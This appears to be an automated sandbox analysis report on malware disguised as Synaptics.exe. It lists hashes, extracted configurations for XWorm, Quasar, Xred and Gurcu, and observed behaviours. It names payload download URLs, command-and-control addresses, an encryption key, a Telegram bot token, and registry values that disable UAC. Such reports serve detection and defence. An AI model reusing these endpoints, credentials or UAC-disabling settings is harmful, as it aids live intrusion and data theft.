Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
01-02-2025 09:21
Behavioral task
behavioral1
Sample
Synaptics.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Synaptics.exe
Resource
win10v2004-20250129-en
General
-
Target
Synaptics.exe
-
Size
764KB
-
MD5
85e3d4ac5a6ef32fb93764c090ef32b7
-
SHA1
adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52
-
SHA256
4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1
-
SHA512
a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab
-
SSDEEP
12288:6MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Ufbj:6nsJ39LyjbJkQFMhmC+6GD9mH
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
xworm
5.0
event-dollar.gl.at.ply.gg:42627
Vu8KDOzYd19RAWuh
-
Install_directory
%ProgramData%
-
install_file
Desktop Window Manager.exe
-
telegram
https://api.telegram.org/bot7269786725:AAF0IPx1BWTdW_vbZqP8HGNrxWWFpF5CvYs/sendMessage?chat_id=5465523859
Extracted
quasar
1.4.0.0
Office
45.136.51.217:5173
QYKKiqqJ0K2HqPP0Mo
-
encryption_key
rFGYI3uEIwvomle2u8mk
-
install_name
csrss.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
NET framework
-
subdirectory
SubDir
Extracted
gurcu
https://api.telegram.org/bot7269786725:AAF0IPx1BWTdW_vbZqP8HGNrxWWFpF5CvYs/sendMessage?chat_id=5465523859
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023cb8-459.dat family_ammyyadmin -
Ammyyadmin family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000d000000023b79-394.dat family_xworm behavioral2/memory/5908-401-0x0000000000300000-0x0000000000310000-memory.dmp family_xworm -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Flawedammyy family
-
Gurcu family
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x00160000000239fe-912.dat family_quasar behavioral2/memory/4848-917-0x0000000000050000-0x000000000009E000-memory.dmp family_quasar -
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Xred family
-
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 47 448 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Powershell Invoke Web Request.
pid Process 448 powershell.exe 5856 powershell.exe 1808 powershell.exe 5744 powershell.exe 2936 powershell.exe 6716 powershell.exe 6120 powershell.exe 2324 powershell.exe 6824 powershell.exe 7000 powershell.exe -
Downloads MZ/PE file 11 IoCs
flow pid Process 12 628 ._cache_Synaptics.exe 12 628 ._cache_Synaptics.exe 20 628 ._cache_Synaptics.exe 196 628 ._cache_Synaptics.exe 210 2672 ._cache_Synaptics.exe 101 2672 ._cache_Synaptics.exe 103 2672 ._cache_Synaptics.exe 108 628 ._cache_Synaptics.exe 110 5500 curl.exe 200 628 ._cache_Synaptics.exe 237 628 ._cache_Synaptics.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts phost.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2260 attrib.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation python-installer.exe Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation PORNHU~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation ._cache_Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation pornhub_downloader.exe Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation ._cache_Synaptics.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3024 cmd.exe 6648 powershell.exe -
Executes dropped EXE 26 IoCs
pid Process 2672 ._cache_Synaptics.exe 4528 Synaptics.exe 628 ._cache_Synaptics.exe 1996 NVIDIA.exe 3568 pornhub_downloader.exe 2316 PORNHU~1.EXE 5908 XClient.exe 6036 loader.exe 6004 phost.exe 2624 phost.exe 5320 Ammyy.exe 5396 Ammyy.exe 5408 Ammyy.exe 4056 python-installer.exe 5176 python-installer.exe 4240 python-3.10.0rc2-amd64.exe 6992 rar.exe 6260 Desktop Window Manager.exe 4848 jrockekcurje.exe 2936 svc.exe 3648 PrivacyPolicy.exe 3692 PrivacyPolicy.tmp 3480 BootstrapperNew.exe 6076 Rar.exe 2264 Desktop Window Manager.exe 5476 Autoupdate.exe -
Loads dropped DLL 19 IoCs
pid Process 4528 Synaptics.exe 4528 Synaptics.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 2624 phost.exe 5176 python-installer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e1rgfodk.3xy\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" loader.exe Set value (str) \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Desktop Window Manager = "C:\\ProgramData\\Desktop Window Manager.exe" XClient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" Synaptics.exe Set value (str) \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\n52tc1fz.jmj\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\n52tc1fz.jmj\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e1rgfodk.3xy\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fttlu2ul.hrx\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fttlu2ul.hrx\\NVIDIA.exe" NVIDIA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\NVIDIA.exe" NVIDIA.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 153 discord.com 11 raw.githubusercontent.com 12 raw.githubusercontent.com 101 raw.githubusercontent.com 151 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 118 ip-api.com 149 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 Ammyy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE Ammyy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies Ammyy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 Ammyy.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 5528 tasklist.exe 6832 tasklist.exe 6424 tasklist.exe 4564 tasklist.exe 4908 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023ccc-450.dat upx behavioral2/memory/2624-454-0x00007FFBB5330000-0x00007FFBB5A00000-memory.dmp upx behavioral2/files/0x0007000000023cca-477.dat upx behavioral2/memory/2624-494-0x00007FFBEC920000-0x00007FFBEC92F000-memory.dmp upx behavioral2/memory/2624-493-0x00007FFBD1A10000-0x00007FFBD1A35000-memory.dmp upx behavioral2/files/0x0007000000023cc5-492.dat upx behavioral2/files/0x0007000000023cc4-491.dat upx behavioral2/files/0x0007000000023cc3-490.dat upx behavioral2/files/0x0007000000023cc2-489.dat upx behavioral2/files/0x0007000000023cc1-488.dat upx behavioral2/files/0x0007000000023cc0-487.dat upx behavioral2/memory/2624-499-0x00007FFBCEA50000-0x00007FFBCEA7D000-memory.dmp upx behavioral2/memory/2624-500-0x00007FFBDF340000-0x00007FFBDF355000-memory.dmp upx behavioral2/files/0x0007000000023cbe-486.dat upx behavioral2/files/0x0007000000023cd1-485.dat upx behavioral2/files/0x0007000000023cd0-484.dat upx behavioral2/files/0x0007000000023ccf-483.dat upx behavioral2/files/0x0007000000023ccb-480.dat upx behavioral2/files/0x0007000000023cc9-479.dat upx behavioral2/files/0x0007000000023cbf-475.dat upx behavioral2/memory/2624-501-0x00007FFBB4C90000-0x00007FFBB51B2000-memory.dmp upx behavioral2/memory/2624-505-0x00007FFBEBB90000-0x00007FFBEBBB4000-memory.dmp upx behavioral2/memory/2624-504-0x00007FFBECB00000-0x00007FFBECB19000-memory.dmp upx behavioral2/memory/2624-506-0x00007FFBCCC90000-0x00007FFBCCE07000-memory.dmp upx behavioral2/memory/2624-527-0x00007FFBE1C30000-0x00007FFBE1C63000-memory.dmp upx behavioral2/memory/2624-528-0x00007FFBCEAD0000-0x00007FFBCEB9D000-memory.dmp upx behavioral2/memory/2624-526-0x00007FFBD1A10000-0x00007FFBD1A35000-memory.dmp upx behavioral2/memory/2624-530-0x00007FFBDF340000-0x00007FFBDF355000-memory.dmp upx behavioral2/memory/2624-532-0x00007FFBCE8B0000-0x00007FFBCE9CB000-memory.dmp upx behavioral2/memory/2624-531-0x00007FFBB4C90000-0x00007FFBB51B2000-memory.dmp upx behavioral2/memory/2624-529-0x00007FFBF19C0000-0x00007FFBF19CD000-memory.dmp upx behavioral2/memory/2624-525-0x00007FFBEBB80000-0x00007FFBEBB8D000-memory.dmp upx behavioral2/memory/2624-524-0x00007FFBE8950000-0x00007FFBE8969000-memory.dmp upx behavioral2/memory/2624-523-0x00007FFBB5330000-0x00007FFBB5A00000-memory.dmp upx behavioral2/memory/2624-668-0x00007FFBCCC90000-0x00007FFBCCE07000-memory.dmp upx behavioral2/memory/2624-667-0x00007FFBEBB90000-0x00007FFBEBBB4000-memory.dmp upx behavioral2/memory/2624-773-0x00007FFBB5330000-0x00007FFBB5A00000-memory.dmp upx behavioral2/memory/2624-788-0x00007FFBE1C30000-0x00007FFBE1C63000-memory.dmp upx behavioral2/memory/2624-785-0x00007FFBCEAD0000-0x00007FFBCEB9D000-memory.dmp upx behavioral2/memory/2624-781-0x00007FFBCCC90000-0x00007FFBCCE07000-memory.dmp upx behavioral2/memory/2624-778-0x00007FFBB4C90000-0x00007FFBB51B2000-memory.dmp upx behavioral2/memory/2624-774-0x00007FFBD1A10000-0x00007FFBD1A35000-memory.dmp upx behavioral2/memory/2624-849-0x00007FFBB5330000-0x00007FFBB5A00000-memory.dmp upx behavioral2/memory/2624-857-0x00007FFBCCC90000-0x00007FFBCCE07000-memory.dmp upx behavioral2/memory/2624-873-0x00007FFBE8950000-0x00007FFBE8969000-memory.dmp upx behavioral2/memory/2624-872-0x00007FFBE1C30000-0x00007FFBE1C63000-memory.dmp upx behavioral2/memory/2624-871-0x00007FFBB4C90000-0x00007FFBB51B2000-memory.dmp upx behavioral2/memory/2624-870-0x00007FFBECB00000-0x00007FFBECB19000-memory.dmp upx behavioral2/memory/2624-869-0x00007FFBEBB90000-0x00007FFBEBBB4000-memory.dmp upx behavioral2/memory/2624-868-0x00007FFBDF340000-0x00007FFBDF355000-memory.dmp upx behavioral2/memory/2624-867-0x00007FFBCEA50000-0x00007FFBCEA7D000-memory.dmp upx behavioral2/memory/2624-866-0x00007FFBEC920000-0x00007FFBEC92F000-memory.dmp upx behavioral2/memory/2624-865-0x00007FFBD1A10000-0x00007FFBD1A35000-memory.dmp upx behavioral2/memory/2624-864-0x00007FFBEBB80000-0x00007FFBEBB8D000-memory.dmp upx behavioral2/memory/2624-863-0x00007FFBCE8B0000-0x00007FFBCE9CB000-memory.dmp upx behavioral2/memory/2624-862-0x00007FFBF19C0000-0x00007FFBF19CD000-memory.dmp upx behavioral2/memory/2624-861-0x00007FFBCEAD0000-0x00007FFBCEB9D000-memory.dmp upx -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2844 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 6708 2936 WerFault.exe 347 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ammyy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ammyy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ammyy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language python-installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language python-3.10.0rc2-amd64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pornhub_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PORNHU~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrivacyPolicy.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language python-installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PrivacyPolicy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jrockekcurje.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 6156 cmd.exe 6656 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a1836637d9f186360000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a18366370000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a1836637000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da1836637000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a183663700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 6044 WMIC.exe 3028 WMIC.exe 2012 WMIC.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 6852 systeminfo.exe -
Kills process with taskkill 18 IoCs
pid Process 7140 taskkill.exe 5508 taskkill.exe 6868 taskkill.exe 3884 taskkill.exe 6532 taskkill.exe 6952 taskkill.exe 5772 taskkill.exe 6816 taskkill.exe 7068 taskkill.exe 5320 taskkill.exe 5368 taskkill.exe 4144 taskkill.exe 2728 taskkill.exe 3652 taskkill.exe 6000 taskkill.exe 5388 taskkill.exe 7124 taskkill.exe 6192 taskkill.exe -
Modifies data under HKEY_USERS 9 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy Ammyy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin Ammyy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr = 537d567366087c6658524c17525384173d84c22bb36b Ammyy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix Ammyy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" Ammyy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" Ammyy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin Ammyy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE Ammyy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = 8cbd6e69b408052bf3afc6021cb55420ba813420e4d6c116ecc034f7904ab1c81553c217c4da63d1a1672aeb57c0ed2405b3be19952726c3ea7e49c8e5a967332581ad8f079d320ce70ca1 Ammyy.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3176 schtasks.exe 6584 schtasks.exe 4584 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3164 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 448 powershell.exe 448 powershell.exe 448 powershell.exe 2032 msedge.exe 2032 msedge.exe 1536 msedge.exe 1536 msedge.exe 5208 identity_helper.exe 5208 identity_helper.exe 6120 powershell.exe 6120 powershell.exe 6120 powershell.exe 2324 powershell.exe 2324 powershell.exe 5856 powershell.exe 5856 powershell.exe 2324 powershell.exe 5856 powershell.exe 1808 powershell.exe 1808 powershell.exe 1808 powershell.exe 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 2936 powershell.exe 2936 powershell.exe 2936 powershell.exe 2936 powershell.exe 6648 powershell.exe 6648 powershell.exe 6716 powershell.exe 6716 powershell.exe 6844 powershell.exe 6844 powershell.exe 6648 powershell.exe 6844 powershell.exe 6716 powershell.exe 6824 powershell.exe 6824 powershell.exe 6824 powershell.exe 5148 powershell.exe 5148 powershell.exe 5148 powershell.exe 7000 powershell.exe 7000 powershell.exe 7000 powershell.exe 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 5476 Autoupdate.exe 5476 Autoupdate.exe 5476 Autoupdate.exe 5476 Autoupdate.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe 1536 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2672 ._cache_Synaptics.exe Token: SeDebugPrivilege 628 ._cache_Synaptics.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 5908 XClient.exe Token: SeIncreaseQuotaPrivilege 4024 WMIC.exe Token: SeSecurityPrivilege 4024 WMIC.exe Token: SeTakeOwnershipPrivilege 4024 WMIC.exe Token: SeLoadDriverPrivilege 4024 WMIC.exe Token: SeSystemProfilePrivilege 4024 WMIC.exe Token: SeSystemtimePrivilege 4024 WMIC.exe Token: SeProfSingleProcessPrivilege 4024 WMIC.exe Token: SeIncBasePriorityPrivilege 4024 WMIC.exe Token: SeCreatePagefilePrivilege 4024 WMIC.exe Token: SeBackupPrivilege 4024 WMIC.exe Token: SeRestorePrivilege 4024 WMIC.exe Token: SeShutdownPrivilege 4024 WMIC.exe Token: SeDebugPrivilege 4024 WMIC.exe Token: SeSystemEnvironmentPrivilege 4024 WMIC.exe Token: SeRemoteShutdownPrivilege 4024 WMIC.exe Token: SeUndockPrivilege 4024 WMIC.exe Token: SeManageVolumePrivilege 4024 WMIC.exe Token: 33 4024 WMIC.exe Token: 34 4024 WMIC.exe Token: 35 4024 WMIC.exe Token: 36 4024 WMIC.exe Token: SeIncreaseQuotaPrivilege 4024 WMIC.exe Token: SeSecurityPrivilege 4024 WMIC.exe Token: SeTakeOwnershipPrivilege 4024 WMIC.exe Token: SeLoadDriverPrivilege 4024 WMIC.exe Token: SeSystemProfilePrivilege 4024 WMIC.exe Token: SeSystemtimePrivilege 4024 WMIC.exe Token: SeProfSingleProcessPrivilege 4024 WMIC.exe Token: SeIncBasePriorityPrivilege 4024 WMIC.exe Token: SeCreatePagefilePrivilege 4024 WMIC.exe Token: SeBackupPrivilege 4024 WMIC.exe Token: SeRestorePrivilege 4024 WMIC.exe Token: SeShutdownPrivilege 4024 WMIC.exe Token: SeDebugPrivilege 4024 WMIC.exe Token: SeSystemEnvironmentPrivilege 4024 WMIC.exe Token: SeRemoteShutdownPrivilege 4024 WMIC.exe Token: SeUndockPrivilege 4024 WMIC.exe Token: SeManageVolumePrivilege 4024 WMIC.exe Token: 33 4024 WMIC.exe Token: 34 4024 WMIC.exe Token: 35 4024 WMIC.exe Token: 36 4024 WMIC.exe Token: SeDebugPrivilege 6120 powershell.exe Token: SeDebugPrivilege 4564 tasklist.exe Token: SeIncreaseQuotaPrivilege 5796 WMIC.exe Token: SeSecurityPrivilege 5796 WMIC.exe Token: SeTakeOwnershipPrivilege 